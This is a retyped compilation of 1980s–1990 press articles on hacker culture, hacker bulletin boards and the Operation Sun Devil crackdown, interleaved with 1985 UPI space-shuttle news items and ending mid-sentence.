written description of your next location.  You go deeper and deeper
into this netherworld, hoping to emerge by the same path with treasure
in hand.  There are almost 200 rooms you pass through on your way to
the treasure, many dotted with hazards, and the path crosses and
intertwines in ways impossible to divine without hours of exploration.
Adventure is the most popular game at LOTS, and indeed it is a
national craze among those with access to computers.  "I would show it
to people on a Fraday afternoon," Woods says, "and they wouldn't leave
their terminals until they finished it, maybe on Monday.
	Adventure is a kind of litmus test for hackers:  if you can
lose yourself in the gullies and misty caverns, you might be
susceptible to computer addiction.  Just as the plot of Adventure is a
world unto itself, the vast memory and operating system of a mainframe
computer is a gigantic landscape, seeming impenetrable but eventually
accessible to the most devoted seekers.  Just as everything in the
physical world is constructed of atoms, everything a computer
processes or reads is ultimately reduced to bits of either one or
zero.  Like treasure seekers in the subterranean Adventure world,
hackers are elcetronic spelunkers who have developed the skill to
burrow down from the more superficial programming languages to the
bedrock machine language of digits.  Woods call this "going down and
doing the grudgies."  To get involved this deeply, you must be able to
think in dizzyingly abstract terms.  Your mental concentration is so
intense that your conciousness is subsumed by the computer.
	When a hacker programs, he creates worlds.  A well-crafted
program - a good hack - is elegant, doing the most work in the fewest
lines of code.  If it displays wizardry and is fairly sophisticated,
hackers call it a nontrivial program, even though what the program
>does< might be absurdly frivolous.  Hackers judge themselves not on
criteria of compassion, wit, altruism or even the results of their
programs.  If your program cures cancer, fine.  If it helps a credit
bureau track down your uncle, tough.  What's important is the
brilliance of the program itself.
	"My level of judgment is technically oriented, one that would
disqualify many who consider themselves hackers," says Mark Crispin, a
systems programmer at SCORE.  "That is, what nontrivial program have
you written?  As opposed to logging in and sending bug reports and
flaming [translation:  bullshitting] on the bulletin board.  I
consider a nontrivial program to be something above a hundred lines of
text, and it depends on what language it is.  It requires some design,
a user interface, a significant amount of time to develop.  It doesn't
matter if the program itself is a great idea."
	Crispin has been holding court for me in the living room of
his condominium, which is decorated in middle-period graduate student
and distinguished only by a half-dozen hand-held computer games and a
terminal hooked up to the telephone.  Crispin is tall, pale, and
though he looks like he's never shaved, he's twenty-five.  He shares
the condo with his finacee, who had been a member of a hacking club at
Columbia University when she spotted a bug in one of Crispin's
programs she was using.  She sent him transcontinental computer mail,
he replied, and the digital correspondence led to a meeting and
eventually a proposal.  She listens approvingly as he speak in a nasal
voice that grows louder when he has a particular point to make.
	Crispin wants to show me something.  He bounds out of his
chair, heads for his terminal and calls the LOTS computer.  He types
in his password, ignores the computer message that tells him he has
electronic mail and demonstrates a program that generates sexual
quips.  Typing its name, Tingle, brings this to the screen:

"I'm back in the saddle again, again!..." shrieked the quadriplegic as
the lurid sabra savagely tossed away his well-cut pants and munched on
his spunk-filled pepperoni.

	Crispin admires the hell out of this hack.  "Tingle is
definitely a nontrivial program," he says.  "It has its own concept of
structured English sentences.  It is completely computer-generated.
Everything Tingle points out makes literal sense.  Tingle builds
scripts of what it's going to do; it remembers male and female
characteristics.  Only then does it randomly choose from vocabulary
columns."
	With all this hoopla, you'd think the program was perfect.
But no program is.  "The program can always work, but you can always
make it better," says Crispin. "You can always have it do something
new, make it perform faster, give it more structure, make it >do<
more!"  Crispin's voice is a high whine, and he's almost out of his
chair.  ">You can always think of ways to make it better!<" You're
never at the point where you stop.  Just when you say, 'It's totally
perfect,' you say, 'Gee, but I can make it do >this<!'"
	Is a computer program a work of art?  Mark Crispin thinks so,
and other hackers agree.  Hackers insist that each programmer wirtes
code in an individual, recognizable style.  Programmers work at a
level of creativity, they say, that is comparable to writing poetry,
composing, painting.  "You can express yourself by writing code," says
Marc LeBrun, a twenty-nine year-old hacker who never aytended college
but spent his teen years at Stanford's Artificial Intelligence Lab.
"And you begin to judge programs on high-level things like style.  You
say, is this a flavorful way to do this?  And people will often get
into huge arguemtnst about something that will ultimately make a
difference of a small microsecond but will have profound stylistic
implications."
	Hackers as artists!  Can it happen?  Will hackers give
dramatic renditions of their latest COBOL hacks?  Will we curl up on
the beach with a good, long word-processing program?  It seems
impossible, because the programmer's art is so self-contained,
esoterically personal, agressively elitist and void of the stuff of
human experience.  "People don't read programs like novels, that's
true," says Stanford computer scientis Dennis Allison. "And it's a
shame."

DON PARKER IS NO FAN of hackers.  Author of "Crime by Computer",
resident expert of computer abuse at the Stanford Research Institute
(SRI) and a lanky, three-piece-suited man who resembles an elongated
Donald Pleasance, Parker thinks that hackers promote an attitude that
could lead to disastrous results.
	Computers are highly prone to being tampered with by knowl-
edgeable intruders.  When a large computer is used in a time-sharing
system, safeguards are installed to prevent users from getting access
to the digital files of other users.  If a troublemaker succeeds in
getting these files, he not only can read the private notes but can
change and even erase them.  Parker fears hackers because they not
only have the know-how to crack security, but they regard these
safeguards as mountaineers regard Mount McKinley.  "The more barriers
you put up, the more compelling the incentive is to break them down,"
Parker says.  Marc LeBrun agrees:  "I think the hacker viewpoint is
that the world exists to hack," he says, "and there aren't any angels
with flaming swords standing over the world saying, 'Thou shalt not
push these buttons.'"
	If those angels existed, hackers would finds programs to dull
their swords.  Despite the best efforts of the business and military
establishment, the hacker-proof security system has yet to be devised.
When SRI gathered a team of crack programmers to test the
inviolability of military defense computers, the programmers were
shocked to find that it took them only one telephone call and a few
minutes to break into files containing top-secret information.
	"What we have to do is change the cultural values in this
[hacker] subculture," says Parker.  "there are instructors in high
school and universities who encourage people to attack security
systems as a means to learn more about computers.  There are people
who think of this a a matter of fun and games, a stimulating thing to
do."
	One idle form of hacker amusement is causing the computer to
crash, or temporarily break down.  I've asked at least six hackers to
explain the thrill of this, and I've received only inarticulate
sentence fragments to the effect of, well, it's >there<.  Maybe they
do it to show the computer who's boss.  One hacker bragged how he set
a few hundred programs into motion that constantly forked into other
programs, which begat even more programs, growing at a logarithmic
rate until the overloaded DEC-20 was brought to its knees.  "I guess
it's a phase everyone goes through," explains another hacker.
	Hackers everywhere delight in these tricks, the more harrowing
the better.  Take Julius Smith's Seppuku program.  Smith is a grad
student who hacks at Stanford's Computer Music Center; he has long
been engaged in a search for the algorithm of the violin.  Smith knows
the old hacker trick of giving an enticing name to a rogue program:
when a user peruses a system's menu and sees something call Seppuku,
he'll access it.  (All hackers have insatiable curiosity about other
programs.)  On the screen the user sees:
		Seppuku is not a program for honorable users.  Do not
		run Seppuku unless you can live with your shame.  Type
		y if you must run it.
	As soon as the poor sucker types 'y', the screen becomes
ablaze with six-inch letters shouting, "GOMEN NASAI!!"  This is
approximate Japanese for "Now you've done it."  The screen immediately
begins to list the titles of every file the user has ever stored in
the computer memory.  These files represent years of work.  "Do you
really want to delete all your files?"  the computer asks. DELETE?
Before the stunned user can fully comprehend the catastropghic
implications of this message, the computer answers with a 'Yes'.  One
by one the files are wiped off the screen.
	"Your every file directory has been deleted," says the
computer.  "Goodbye - have a good life." Then the user is logged out.
Screen blank.
	"Seppuku doesn't REALLY delete the files," says Smith.  "It
just looks like it does.  You see, hackers really don't hurt anyone."
	But once a hacker has the knowledge to crack security, he
simply has to be trusted.
		At a terminal sits a hacker and a wheel by his prompt
		And his screen shows the reminders
		Of every bug that broke his code or
		halted
		Till he cried out, in his anger and his shame
		I am leaving, logout, killjob, but the hacker still
		 remains....
	After a few quarters at Stanford, Ernest Adams began to
reassess hacking: what had it done for him?  What had it done TO him?
He had learned an incredible amount about computers but felt cut off
from the mainstream.  He had top grades in this programming courses
but had failed calculus because he spent too much time at LOTS.  He
looked at some of his fellow hackers and decided that their devotion
to computers was eroding their humanity.  Was he turning into a
maching himself?
	Stored within the LOTS computer memory is a computer bulletin
board that is open to comment and response from any user in the
system.  Items on B-Board range from lonely-hearts messages to offers
to sell bicycles, to long-winded debates about issues of school
politics, world affairs and computing ("If a computer had a voice,
which sex would it be?").
	One intense B-Board exchange dealt with the concerns Adams had
about excessive hacking.  The opening salvo was launced by a
disgruntled hacker who flamed about the narrowness, inhumanity and
addictiveness of hacking - he called LOTS an "alien culture" whose
inhabitans' personalities are irreversibly shaped by machine.  This
kicked off a running debate between those like Adams who agreed with
the gist of the attack, and hackers who defended their long hours of
interfacing with "the infinite tool."
	A Stanford psychology professor named Philip Zimbardo acquired
a printout of this debate and sent it to "Psychology Today", which
presented it as "The Hacker Papers," accompanied by Zimbardo's
commentary.  He suggested basically, that hackers would be well
advised to join the human race.  The article made many of the LOTS
hackers self conscious.  "I sometimes try to hide the fact that I'm a
hacker," says Dan Newell.  Others are now defensive at the least sign
of disapproval, charging their critis with "computerphobia."  "Why
single >us< out?" says one.  "Why not talk about how much time the
Stanford marching band practices?"
	All hackers, though, have a hedge against insecurity:  they
are needed.  "The computer field is growing at a termendous rate,"
says Dennis Allison, "and it's going to take a concentrated amount of
wizardy to bring it about."  As our dependence on computers increases,
it will be the hackers who can best create the supersoftware that will
keep society from imploding into a mass of jumbled bits.  An industry
study showed that one good programmer is as productive a ten merely
competent ones; a wizard-level programmer can almost name his price.
The viciously competitive computer firms are desparate for hackers,
who ask only for flexible working hours, no dress or etiquette
requirements, and, above all, nontrivial, trailblazing tasks.  Then
the hackers proceed to work sixteen-hour days until the project is
completed.  "There're lots of opportunities to make an obscene amount
of money," says LOTS staffer Bob Knight.
	Such "real world" pursuits (along with other distractions like
marriage and family) have the potential of eventually turning a hacker
from his computer extremism.  So, many of the LOTS hackers see
Stanford - and possibly graduate school - as a last chance to run amok
with the DEC-20.  As Julius Smith puts it:  "My [student] funding runs
out in a year.  This is my last chance to do something pure in my
life."
	Some hackers find ways of remaining "pure": taking on
temporary programming stints at Silicon Valley's high-tech operations,
keeping a connection with other hackers by illegal accounts on
university computers.
	But Ernest Adams prefers a more conventional existence.  He
wants to be counted among those who have hacked intensely for a year
or two, then managed to grow out of it.  He took off a quarter of his
sophomore year to work computers for the Viking Mars Landing Project,
and later took off more time to do some professional programming.  He
made a conscious effort to pay more attention to his other studies and
get back into the mainstream of users, nonwinners, and even people who
don't know a byte form an escape key.  He once was convince that
hacking was transitory, that society need not worry about it
proliferation.  Now he sees more hackers than ever, and he's not so
sure.  Still, he believes he has freed himself from computer
addiction.
	But old obsessions die hard.  Recently, at six in the morning,
Adams was at LOTS working at a terminal.  "Just editing a paper" was
his excuse.  But he offered no apologies for speaking in rapturous
tones about his planned thesis for a computer doctorate.
	"I would like to write a program that reproduces, that reacts
negatively or positively to its environment and, most important of
all, could be mutated by its environment.  I would like to see if I
could start several of these programs running, and start some sort of
superior program that watches them mutating, and see if they evolve.
That's the God program.  It invents the environment, reates the data
that the programs read, and will mutate the programs...."
	Adams flames on rabidly, his face lit up like a display for a
well-hacked game.  The God program will create hot spots to control
the motions of the one-celled programs.  A maturation factor will
control the growth and adolescence of the one-cells.  The program
might well duplicate the theory of natural selection, and be a kind of
vindication of Darwinian theory ....>I am leaving, logout, killjob,
but the hacker still remains.<

[end of article from April Rolling Stone by Steven Levy]
 			_______________________________________
			[				      ]
			[THE SHADOWY WORLD OF COMPUTER HACKERS]
			[   An Article on us 'Naughty Boys'   ]
			[	Typed by: Shadow's Pawn       ]
			[  Original article in U.S. News and  ]
			[      World Report June 3, 1985      ]
			[				      ]
			[     Converted to 80 Columns by      ]
			[	    The Slipped Disk	      ]
			[				      ]
			[	   The Fifth Precinct	      ]
			[	     [502] 245-8270	      ]
			[_____________________________________]


  Flash!:  The FBI and private firms are cracking down on teenagers who use
	   terminals to swap tips on how to break the law.

  The following article recently published in U.S.  News and World Report (June
3, 1985) reveals the shocking truth about the underworld of the Computer Hacker,
or does it?  This is basically educating thier reader on the crimes that are
committed each and every day on bulletin board system around the United States.

Read and enjoy...

       Shadow's Pawn/Control

-----------------------------------------------------------------------------

  Want to learn the intricacies of picking locks?  The recipe for nitro-
glycerin?  Or methods of making free long-distance phone calls?  How about
someone else's credit-card number for a shopping spree?  Curious how to kill
with your bare hands?

  Until a few weeks ago, all this was available to users of COSMOS, a comput-
erized "bulletin board" run by a 16-year-old high-school student known as Time
Lord to his fellow 'hackers,' or computer tinkerers.  His board collapsed in
late April after police and agents of the Federal Bureau of Investigation and
the Secret Service came to his West Bloomfield, Mich., home.  Dad took away the
computer.

  Time Lord escaped arrest, but six high-school students in Waukesha, Wis.,
weren't so lucky.  On April 25, they were arrested in a seperate case for
allegedly using stolen credit-card numbers to obtain thousands of dollars'
worth of computer equipment.  The numbers, said the Milwaukee Journal, were
disseminated over a computer bulletin board called the World of Cryton.

  These incidents shed light on a shadowy subculture in which hackers- nearly
all teenage boys- swap information and joust over who knows the most, and whose
exploits are the most daring.  To read their exchanges on computer monitors is
to enter a world of bright young zealots whose talents at manipulating complex
computers are often accompanied by a blithe disregard for authority.  Some are
barely in their teens and already are lawbreakers.  Almost all come from
affluent famlies.

  Messages that cross back and forth bring to mind a fraternity food fight, a
detailed phone-system manual, a sex novel and a bomb factory rolled into one.
many seem sophmoric --strewn with profanities questioning the masculinity of
other system users.

  "The bulletin boards,"says FBI agent John Anthony in Detroit,"give this aura
of Robin Hood, and young kids-particularly bright young kids- get involved in
this as a challenge to the Establishment."

  MOST LEGITAMITE.  Bulletin boards are do-it-yourself electronic-message
systems.  Anyone with a personal computer and a modem-a device that lets
computers communicate over phone lines- can participate.  Special software is
needed to operate a board.

  More than 1,000 (GET REAL!) such bulletin boards exist now.  The great bulk of
them are totally legitimate.  They offer to people with common in- terests an
electronic meeting place to exchange messages about using their computers and
software.  Some boards are dedicated to a special interest, such as humor, law,
education or health.  Others allow users to order goods and are, in effect,
electronic shopping services.

  "The subject matter ranges from software swapping to games to information
about specific programs to finding the woman of your life," says James Cambron
of Kansas City, who runs a bulletin board that distributes facts about other
boards.

  But a minority of boards cater to interests distinctly outside the main-
stream.  On the political left, a Long Island board, called the Revolution,
carries messages assailing President Reagan's Central America policy and calling
for a campaign against the opening of a nearby nuclear power plant.  When the
user signs off, the system says, "Dosvedonia comrade"-an approximation of
'goodbye' in Russian.

  On the right is a network of boards that attack blacks and Communists.Elec-
tronic files called "Know Your Enemies" claim to provide details about Jewish
organizations and 'race traitors".  Their operators, according to the Anti-
defamation League of N'nai B'rith, are right wing extremists who "seek to spr-
ead their hate propaganda among young people, surely the most vulnerable to its
influence."

  The segment run and used by young hackers, however, attracts the most at-
tention from law-enforcement agencies and companies whose computers store vast
amounts of information.  John Maxfield, a Detroit consultant who monitors such
boards for business clients, says they are strewn with material that is "either
borderline illegal or outright illegal or encourages illegal activities."


  "PHREAKING." Telephone companies are especially upset about bulletin boards
that contain sections devoted to "phreaking" - making toll calls free of charge.
Phreaking includes such techniques as breaking into corporate switchboards
through phone lines to make conference calls and using ill-gotten identifacation
numbers for Sprint, MCI and other toll services.

  Explains maxfield:  "If you're into calling bulletin boards, a big problem is
phone-bill shock at the end of the month.  So a lot of boards, while not
catering necessarily to illegal activities, generate a lot of fraudulent calls."

  Many hacker-phreakers see nothing wrong with phone scams.  " I only abuse
people who charge too much for thier long-distance calls," says one called the
Comedian, a 17-year-old from Bethesda, Md "I've heard some pretty bad things
about the phone company."

  Reflecting the youth of most users, a hacker known as Access Finder recently
said on a board in Colorado called the Operating Room that he had been inactive
for a while because "my computer had a major [expletive] when my mother spilled
water from the plants all over it." He then asked other users to supply him with
"codes for anything, " including businesses,government agencies, phone firms and
banks.

  Typical of the subterranean boards is one in Boulder, Colo., called Off The
Wall.  Operated by Psycho, the board requires the last four digits of a users
phone number and a seven character password for access.  To make certain that
they are not infiltrated by police or security agents, most system operators
subject new users to "character checks" before granting passwords or access to
some of the systems' more dubious sections.  Some operators demand references
from other hackers and automatically look askance at anyone older then 20.

  "The bulletin boards out there have far better security than most corporate
mainframes.  and that's pretty frightening and astounding,"says former hacker
Ian Murphy, now a security consultant.


  LAYERS OF ACCESS.  Users with "Level I" security clearence on Off The Wall can
read and leave messages on subboards dedicated to specific computer brands,
product reviews and general announcements.  The next level permits access to
messages dealing with such topics as software trading and X-rated and
destructive materials.	The highest level brings one to messages providing
passwords and access codes for commercial computers and details on ways to make
illegal long-distance phone calls.

     Among some tidbits found recently on Off The Wall--


  o Excerpts from sexually explicit material published in Penthouse magazine.

  o Account numbers and passwords of Dow Jones News/Retrieval and CompuServe
    commercial data bases.

  o Personal identifacation numbers for various Sprint and MCI long-distance
    accounts.

  o Purported recipies for a biotoxin of wheat, a "cheap,very explosive,water-
    sensitive device" made with potassium and emptied cold capsules.


  Before its abrupt end, COSMOS, in addition to its message boards, carried long
atricles on such subjects as making drugs, the basics of hand-to-hand combat,
the ins and outs of the big TRW computers that house credit data on 120 million
Americans, how to build devices for making toll free calls and ways to convince
an operator that you work for the phone company.  "It's amazing how many people
know so much about our operators and how to use our system,"says Neal Norman, a
district manager of corporate security for American Tele- phone & Telegraph.

  COSMOS also contained a subsection for "trashing"--searching a company's
garbage for discarded credit-card carbons or computer printouts carrying
valuable access codes.	One trasher's advice:  "Look everywhere and anywhere.
People are dumb these days you can get good trash anywhere."


  PIRATES ONLY.  Boards like POBBS-- Pirates Only Bulletin Board System-- in
suburban New York are drawing notice from software firms trying to stamp out
piracy of thier copyrighted products.  Operated by Exorcist, a 19 year-old
college student, POBBS exists mainly to allow users of International Business
Machines personal computers to swap commercial software over the phonelines .
Dozens of copyrighted programs,including Lotus 1-2-3 and Wordstar, are ava-
ilable free through POBBS.

  Fun and games for curious teenagers?	That's the attitude they often convey .
"It's enjoyable taking risks,and it gives you a feeling of power because it puts
you above most of the population," explains Demon of the Boston area.

  Victims of these teenagers are not amused.  So seriously do long-distance
companies view the problem that they formed the Communications Fraud Control
Association to exchange information about illegal bulletin boards and lobby for
stronger legislation.  "One person with one code is not enough to give us much
of a problem," says Van Willson, a security official for GTE Sprint.  "The
problem is that the little fellows start posting them on the boards."


  PRECAUTIONS.	All of the major toll carriers, as well as TRW claim to moni-
tor the boards closely.  AT&T regularly briefs operators about fraud scams.  TRW
offers seminars on security for clients , who use it's service to check thier
customers credit ratings.  A key point:  TRW people never call clients asking
them to "confirm" thier subscriber numbers.

  Police also are looking at bulletin boards more carefully.  But prosecution is
sometimes difficult.Thomas Tcimpidis , a 34-year-old TV engineer in Calif-
ornia, was arrested on state charges after someone posted a telephone credit
-card number on his board.  Tcimpidis argued that he was unaware that the stolen
number was there.  Charges against him were dropped last February.  California's
Legislature is being asked to outlaw the unauthorized placement of personal
information on bulletin boards.  State Senator John Doolittle intro- duced this
proposal not long after New- sweek reporter Richard Sandza told of harassment by
vengeful hackers angry about the article he had written on underground boards.
One of them broke into a TRW computer, obtained Sandza's credit-card and Social
Security numbers and published them on bulletin boards around the country.


  A RIGHT?  Many law enforcers feel powerless against the boards.  Using stolen
code or card numbers is clearly illegal.  Is posting those numbers on a computer
bulletin board a crime as well ?  Answers are murky.  Some lawyers argue that
this activity is a First Amendment right,no matter how unsavory.

  County officials in Phoenix interpret Arizona's computer-crime aw broad- ly.
Reasoning that illegal toll calls are routed through a phone company's
computerized switchboard, authorities recently arrested two system operators
whose boards listed long-distance access codes belonging to others and char- ged
them with facilitating computer fraud.

  So hackers are starting to feel the heat.  Some say they are cutting back on
thier activities.  "A lot of people are very paranoid," says Shadow, an 18-year
-old in New Jersey.

  Like Shadow, other young computer wizards now must weigh the thrills of using
high-tech skills to challenge "the system" against the possibility of a criminal
record.

--------------------------------------------------------------------------------
NOTE: The following is from the UPI newswire services.	More information
      can be found in option "T".


 CAPE CANAVERAL, Fla.  (UPI) _ A "space Coke can" for carbonated beverages will
be tested during the next space shuttle flight set to start July 12, the space
agency announced Thursday.

 The National Aeronautics and Space Administration said the Coca-Cola Co.
developed at its own expense and initiative a way to dispense carbonated drinks
in weightlessness.

 Up to now, NASA said it was not possible for astronauts to consume carbonated
beverages in weightlessness "because there was no adequate way to dispense
carbonated beverages."

 "The new technology will provide an alternative source of liquid consumption
for astronauts," NASA said.

 The upcoming test is part of an agreement between NASA and Coca-Cola under
which the company will grant NASA a license to use the space can design for
unrestricted use in dispensing beverages in space.

 NASA said other companies are welcome to propose different technology to
achieve the same purpose.
_________


  44  upi 06-20-85 02:32 ped

Hangar accident blamed on human error
By WILLIAM HARWOOD
UPI Science Writer

 CAPE CANAVERAL, Fla.  (UPI) _ A hangar accident that damaged the shuttle
Discovery last March was caused in part by disregard of a "Do Not Operate" tag
on a broken hoist, a NASA report said Thursday.

 Although the Lockheed Space Operations Co.  was responsible for operation and
maintenance of the work platform hoist that failed, the investigation board
said "this company inherited the system and a certain tradition of its misuse
by NASA and its predecessor contractors."

 The accident occurred March 8 when a cable in the hoist for a 2,500-pound
mobile service platform broke and dropped the platform on Discovery's left-side
payload bay door, puncturing it in two places and injuring a technician.

 Gary Sutherland suffered a broken leg in the incident and Discovery's flight
was delayed 18 days, until April 12, so the payload bay door damage could be
repaired at a cost of $200,000.

 "The mishap can be characterized as the logical culmination of a series of
events and conditions which pushed the mechanical components to and beyond
their limits," the accident report said.

 The report said factors contributing to the accident included improper
operation of the service platform, poor operating instructions, violations of
safety rules and inadequate maintenance.

 A Lockheed techincian reported that a switch failed on the hoist March 4 and
one of two redundant cable links was severed, the report said.	The entire
system then was flagged with the "Do Not Operate" tag.

 Despite the tag, the hoist was used at least twice between March 4 and March
8, causing great strain to the master link in the remaining cable assembly, the
report said.

 When the platform was moved March 8, the jolt was enough to fracture the
remaining cable link and the platform fell.

 The report said the Lockheed technicians who admitted using the platform March
6 "stated that they saw some tags, believed them to be old tags and proceeded
to operate the platform."

 _________



The only _ satellite launched)
By WILLIAM HARWOOD
UPI Science Writer

 CAPE CANAVERAL, Fla.  (UPI) _ Discovery's crew launched a boxy satellite today
to look for evidence of a black hole at the core of the Milky Way and ground
crews promised no more foul-ups for a rescheduled "Star Wars" test.

 Astronaut Shannon Lucid, using the shuttle's 50-foot-long robot arm, released
the 2,190-pound Spartan satellite at 12:02 p.m.

 If all goes well, the automated observatory will be retrieved Saturday after
spending 45 hours on its own recording X-rays from the heart of the Milky Way
and from a cluster of galaxies in the Perseus constellation.

 Scientists hope to use the data to learn more about the evolution of the
universe and whether black holes, objects with such intense gravity even light
cannot escape, are common in the cosmos.

 Commander Daniel Brandenstein, co-pilot John Creighton and crewmates Shannon
Lucid, Steven Nagel, John Fabian, Frenchman Patrick Baudry and Saudi Prince
Sultan Salman Al-Saud have sailed through the first three days of the 18th
shuttle mission.

 The only glitch in what is shaping up as the smoothest flight in the shuttle
program came Wednesday when the first space test of a "Star Wars" missile
defense experiment was bungled.

 Flight director Milt Heflin said Brandenstein was given incorrect information
to orient the shuttle to reflect a laser beam fired from Hawaii back to the
ground station for analysis.

 The test was rescheduled today for Friday and a morning teleprinter message
from ground controllers promised to "get the altitude right for your next
attempt."

 Otherwise, the flight has proceeded so smoothly mission controllers beamed up
a recording of "The Sounds of Silence" early today because the crew has had so
little to say.

 "We were trying to pick a theme song for this flight and we thought that was
appropriate," said Robert Springer in mission control.

 "Yeah, we thought that might be a subtle hint," Nagel replied.

 Three communications satellites owned by Mexico, the Arab League and American
Telephone & Telegraph Co.  have been successfully launched since blastoff
Monday to earn NASA about $30 million.

 Spartan is a reusable, $3.5 million satellite designed to provide a relatively
inexpensive way to conduct useful astronomy from orbit.

 Powerful bursts of X-rays from the core of the Milky Way, shrouded behind
thick veils of interstellar dust and debris, seem to indicate the presence of a
black hole possibly 4 million times more massive than the sun.

 By definition, black holes cannot be detected visually.  But theory holds that
as matter is sucked in it is accelerated and heated, which produces X-rays.
Spartan automatically will record the radiation for analysis on the ground.

 The shuttle "Star Wars" test is a significant step in a program that could
lead to a weapons system in which ground lasers would bounce blasts of energy
off giant orbiting mirrors to destroy enemy missiles in flight.

 Bouncing a low-power laser beam from Hawaii off a mirror mounted in a shuttle
window Wednesday, scientists had hoped To demonstrate the capability of
correcting the beam for atmospheric distortion.

 But Brandenstein's flight plan contained the wrong information for the
shuttle's guidance system to correctly point the shuttle _ and the mirror _ at
the ground station 9,994 feet up Mount Haleakala on the island of Maui, Hawaii.

 Heflin said the flight plan called for the guidance information to be entered
into the shuttle computers in feet when it should have been entered in nautical
miles.

 So instead of aiming the mirror at a target 1,644 nautical miles high, the
shuttle aimed at a target 9,994 miles high.  The result:  the mirror was
pointed toward deep space instead of Hawaii.

 "It'll work the next time, assuming the weather is going to be good," said Air
Force Lt.  Gen.  James Abrahamson, director of President Reagan's Strategic
Defense Initiative _ commonly referred to as "Star Wars."

 ____________

  36  upi 06-20-85 05:21 aed

 Astronaut joins private space firm
 By BETTY LUMAN

 HOUSTON (UPI) _ Joseph Allen says he never expected to retire as an astronaut
at age 65, so he will leave NASA after 18 years to become vice president of a
private space firm a few days after his 48th birthday.

 Allen, who rescued a 1,265-pound stranded satellite in November by flying over
to it with a jet backpack, said Wednesday he is resigning from NASA effective
July 1.

 The physicist was selected an astronaut-scientist in August 1967.  He will
become executive vice president of Space Industries Inc., a Houston firm
pursuing ventures in the commerical use of space.

 "My memory is more filled now with wonderful events ...  than I ever could
have imagined when Alan Shepard called me those 18 years ago," he said.

 Allen, 48, said he is leaving NASA with "considerable nostalgia and sadness,
but some excitement.  I never pictured myself retiring at 65 from the astronaut
office.

 "It's good news and good news.  I found another job and it's still in the
space business."

 Allen flew on two space missions _ the first fully operational flight of the
shuttle in November 1982 and the spectacular salvage mission of two $35 million
satellites two years later.

 On the 14th shuttle mission, Allen and Dale Gardner took turns on two
different days to fly over to the Palapa and Westar satellites, grab them with
a grappling hook and manhandle them into the shuttle Discovery's cargo bay with
the help of the robot arm operated by astronaut Anna Fisher.

 It was the first time stranded satellites were plucked from orbit and returned
to Earth for repair.

 Space Industries last year signed a memorandum of understanding with NASA to
design and build the world's first man-tended space platform.  It is
negotiating agreements for launch of the platform in 1989.

 The president of SII is Dr.  Maxime Faget, former director of engineering and
development at the Johnson Space Center.

 Doug Lilly, another SII vice president, said plans call for the shuttle to
dock with the platform so astronauts can work in a "shirt sleeve environment"
on various experiments that then can be left alone for 30 to 90 days.

 _________

By WILLIAM HARWOOD
UPI Science Writer


   The rest of the 1985 launch schedule:


 _June 12:  Discovery returns to service with a three-satellite payload;
 _July 15:  Challenger is launched on a Spacelab mission;
 _Aug. 10:  Discovery carries three communications satellites into orbit;
 _Sept.26:  The new shuttle Atlantis, the fourth and final shuttle in NASA's
	    fleet, blasts off on a secret military mission;
 _Oct. 16:  The original shuttle Columbia, which has been under going
	    modifications, returns to service for a Spacelab mission and its
	    first flight since November 1983;
 _Nov.	8:  Challenger is launched with three satellites;
 _Dec. 20:  Columbia takes off on a satellite-launching mission.
 ____________________________________________________________________________
Sunday, June 3, 1990. New York times
        Drive to counter computer crime aims at invaders
           Legitimate users voice worries over rights
By John Markoff
Transcribed by Dr. Strangelove.

  From Los Angeles to Atlanta, Federal and State law-enforcement
agents have begun an intense battle against computer operators who
break into government and business data systems.
  The agents, under mounting pressure from corporations and
lawmakers, say the crackdown is needed to halt a growing threat to
commerce, research and national security.
  But increasingly, civil liberties experts and even some computer
industry executives say the crackdown is affecting computer users
who are not breaking the law. These experts say such users are
being intimidated and are suffering illegal searches and violations
of their constitutional guarantees to free speech.
                 Crimes `In the blink of an eye'
  In many ways the computer crackdown parallels the campaign
against drugs, with officials responding to an outcry over a
serious problem only to confront another outcry over assaults on
civil rights. 
  "It's a whole new era," said Stephen McNamee, United States
Attorney for Arizona, who has been a central figure in Government
efforts to counter computer crime. "Computer are providing a new
avenue for criminal activities. It is possible to transmit computer
information for an illegal purpose in the blink of an eye."
  But representative Don Edwards, a California Democrat, said the
authorities had gone too far. "every time there is a perceived
crisis, law-enforcement agencies and legislators overreact, and
usually due process and civil liberties suffer," Mr. Edwards said.
"The Fourth Amendment provides strict limits on rummaging though
people's property."
  The largest of several investigations under way around the
country is a two year old federal effort called Operation Sun
Devil, in which about 40 personal computer systems, including
23,000 data disks, have been seized from homes and businesses. 
  The seizures, resulting from 28 search warrants in 14 cities,
haled the operations of some computer bulletin board, telephone-
linked services that permit users to post and read messages. Little
or any of the confiscated equipment had been returned. In all,
seven people have been arrested so far. 
 
  One computer game maker who has not been charged says he is on
the verge of going out of business since investigators seized his
equipment. 
  In related inquires, the Secret Service has surreptitiously
eavesdropped on computer bulletin boards and telephone
conversations, and in the process agents have entered these
networks posing as legitimate users and traded information.

  In an unrelated investigation of the theft of an important
program from Apple Computer Inc. last year, dozens of experts and
hobbyists have recently been interrogates by the Federal Bureau of
Investigation.

  Civil libertarians and some business executives have begin to
organize defenses, amount them is Mitchell D. Kapor, creator of the
nation's most popular software program, the Lotus 1-2-3-
spreadsheet, who is planning to help finance a legal defense fnud
of several hundred thousand dollars for some of those accused. 

                  Legal protections are unclear

  Harvery Silvergate, a Massachusetts lawyer and civil liberties
expert who is working with Mr. Kapor, said, "You have innocent
people who are being terrorized as well as investigators of people
who have broken the law." He termed the Government action a
"Typical American solutions: throw your best and brightest in
jail."
  Officials of the Secret Service, which since 1984 has been the
primary Federal enforcer of computer fraud laws, believe that an
alarming number of bright young computer enthusiasts are using
computer illegally.
  "Often," said Gary M. Jenkins, Secret Service assistant director,
"a progression of criminal activity occurs which involves
telecommunication fraud, unauthorized access to other computers,
credit card fraud, and then moves on to other destructive
activities like computer viruses." [How many buttons can we push in
one sentence? Sheesh!]
                  A 1986 Law on Computer Crime
  A 1986 Federal Law on computer fraud and abuse makes it a crime
to enter computers or take information from them without
authorization. 
  But Mr. Kapor of Lotus said he believes that danger posed by the
computer joy riders has been greatly exaggerates. "Now that the
Communists aren't our enemies anymore, the American psyche has to
end up inventing new ones," he said.
  He and other experts are also alarmed by new investigative
techniques that employ computers. The power of advanced machines
multiplies the risk of search and seizure violations, these experts
say, because they can perform so many simultaneous tasks and absorb
and analyze so much information. 
  Moreover, civil liberties advocates say the perils are greater
because legal precedents are not clear on how the First Amendment
protects against searches and seizures in the electronic world.
                     Government surveillance
  In response to a count-enforceable request under the freedom of
Information Act, the Secret Service has acknowledged that it sa
monitored computer bulletin boards. In its answer to the request,
made my Representative Edwards, the agency said its agents, acting
